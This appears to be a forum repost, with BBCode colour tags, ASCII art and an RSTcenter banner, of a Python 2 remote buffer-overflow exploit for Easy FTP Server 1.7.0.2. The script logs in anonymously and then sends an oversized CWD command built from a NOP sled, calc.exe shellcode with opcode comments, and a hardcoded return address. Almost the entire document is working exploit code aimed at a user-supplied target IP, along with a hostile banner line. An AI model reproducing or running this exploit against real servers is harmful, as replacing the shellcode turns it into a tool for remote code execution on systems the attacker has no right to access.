#!/usr/bin/python import socket, sys [color=#3300ff]# , # dM # MMr # 4MMML . # MMMMM. xf # . "M6MMM .MM- # Mh.. +MM5MMM .MMMM # .MMM. .MMMMML. MMMMMh # )MMMh. MM5MMM MMMMMMM # 3MMMMx. 'MMM3MMf xnMMMMMM" # '*MMMMM MMMMMM. nMMMMMMP" # *MMMMMx "MMM5M\ .MMMMMMM= # *MMMMMh "MMMMM" JMMMMMMP # MMMMMM GMMMM. dMMMMMM . # MMMMMM "MMMM .MMMMM( .nnMP" # .. *MMMMx MMM" dMMMM" .nnMMMMM* # "MMn... 'MMMMr 'MM MMM" .nMMMMMMM*" # "4MMMMnn.. *MMM MM MMP" .dMMMMMMM"" # ^MMMMMMMMx. *ML "M .M* .MMMMMM**" # *PMMMMMMhn. *x > M .MMMM**"" # ""**MMMMhx/.h/ .=*" # .3P"%....[/color] [color=#3300ff]# [/color] [[color=#00cc00]Marian[/color]][color=#3300ff]nP"FTP"*[/color][[color=#00cc00]RSTcenter[/color]] [color=#0000ff]#[/color] [color=#ff0000]Fuck[/color] [color=#ffff00]The[/color] [color=#3300ff]Police[/color] [color=#3300ff]#[/color] [b][u][color=#ff0000]RSTcenter.Com[/color][/u][/b] print """ ************************************************* * Easy FTP Server 1.7.0.2 Remote BoF * * Discovered by: athleet * * jonbutler88[at]googlemail[dot]com * ************************************************* """ if len(sys.argv) != 3: print "Usage: ./easyftp.py <Target IP> <Port>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) # Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng) # # B *0X009AFE44 # shellcode = ( "\xba\x20\xf0\xfd\x7f" # MOV EDX,7FFDF020 "\xc7\x02\x4c\xaa\xf8\x77" # MOV DWORD PTR DS:[EDX],77F8AA4C "\x33\xC0" # XOR EAX,EAX "\x50" # PUSH EAX "\x68\x63\x61\x6C\x63" # PUSH 636C6163 "\x54" # PUSH ESP "\x5B" # POP EBX "\x50" # PUSH EAX "\x53" # PUSH EBX "\xB9\xC7\x93\xC2\x77" # MOV ECX,77C293C7 "\xFF\xD1" # CALL ECX "\xEB\xF7" # JMP SHORT 009AFE5B ) nopsled = "\x90" * (268 - len(shellcode)) ret = "\x58\xFD\x9A\x00" payload = nopsled + shellcode + ret # 272 bytes print "[+] Launching exploit against " + target + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) # Send payload... print "[+] Sending payload..." s.send('CWD ' + payload + '\r\n') try: s.recv(1024) print "[!] Exploit failed..." except: print "[+] Exploited ^_^"
